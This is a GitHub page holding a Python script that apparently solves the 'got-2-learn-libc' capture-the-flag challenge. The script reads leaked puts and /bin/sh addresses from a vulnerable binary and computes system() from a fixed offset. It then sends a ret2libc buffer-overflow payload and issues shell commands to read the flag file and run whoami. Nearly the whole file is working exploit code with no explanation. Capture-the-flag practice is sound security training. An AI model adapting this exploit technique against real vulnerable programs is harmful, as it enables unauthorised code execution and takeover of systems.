-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathgot-2-learn-libc.py
56 lines (45 loc) · 1.64 KB
/
got-2-learn-libc.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
#! /usr/bin/python3
import subprocess
process = subprocess.Popen(["/problems/got-2-learn-libc_0_4c2b153da9980f0b2d12a128ff19dc3f/vuln"],stdin=subprocess.PIPE,stdout=subprocess.PIPE,stderr=subprocess.PIPE)
out = process.stdout
out.readline()
out.readline()
s = out.readline()
puts_address = s[s.find(ord("x"))+1:s.find(ord("x"))+9]
puts_address = int(puts_address,base=16)
print(hex(puts_address))
system_address = puts_address - 149504
print(str(hex(system_address)))
out.readline()
out.readline()
out.readline()
s = out.readline()
bin_sh_address = s[s.find(ord("x"))+1:s.find(ord("x"))+9]
bin_sh_address = int(bin_sh_address,base=16)
print(hex(bin_sh_address))
#print(bytes(bin_sh_address))
#print(bytes("llll",encoding="ascii"))
#print(bytes(system_address))
shellcode=bytes(0)
for i in range(40):
shellcode +=bin_sh_address.to_bytes(4,byteorder = 'little')
shellcode += system_address.to_bytes(4,byteorder = 'little')
for i in range(10):
shellcode += bin_sh_address.to_bytes(4,byteorder = 'little')
shellcode+=bytes("\n",encoding='ascii')
print(shellcode.hex())
out.readline()
print(str(out.readline()))
process.stdin.write(shellcode)
process.stdin.flush()
print(str(out.readline()))
print(str(out.readline()))
process.stdin.write(bytes("cat /problems/got-2-learn-libc_0_4c2b153da9980f0b2d12a128ff19dc3f/flag.txt \n",encoding="ascii"))
#process.stdin.write(b'cat /problems/got-2-learn-libc_0_4c2b153da9980f0b2d12a128ff19dc3f/flag.txt\n')
#process.stdin.write(b'whoami\n')
process.stdin.write(bytes("whoami\n",encoding="ascii"))
process.stdin.flush()
print(str(out.readline()))
print(str(process.stderr.readline()))
process.wait()
print(process.returncode)